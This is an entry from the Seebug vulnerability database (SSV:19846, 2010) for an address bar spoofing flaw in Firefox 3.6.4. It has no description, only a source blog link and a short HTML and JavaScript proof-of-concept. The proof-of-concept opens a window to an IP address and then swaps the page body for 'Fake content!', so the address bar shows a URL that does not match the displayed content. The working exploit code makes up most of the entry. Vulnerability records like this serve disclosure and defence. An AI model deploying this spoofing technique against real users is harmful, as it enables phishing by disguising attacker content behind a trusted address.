Mozilla Firefox 3.6.4 address bar欺骗漏洞 POC

2010-06-23T00:00:00
ID SSV:19846
Type seebug
Reporter Root
Modified 2010-06-23T00:00:00

Description

No description provided by source.

                                        
                                            
                                                http://hi.baidu.com/aullik5/blog/item/ebf24017cf670b4720a4e939.html

<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
setTimeout('w.document.body.innerHTML = "Fake content!";w.stop();', 500);
}
</script>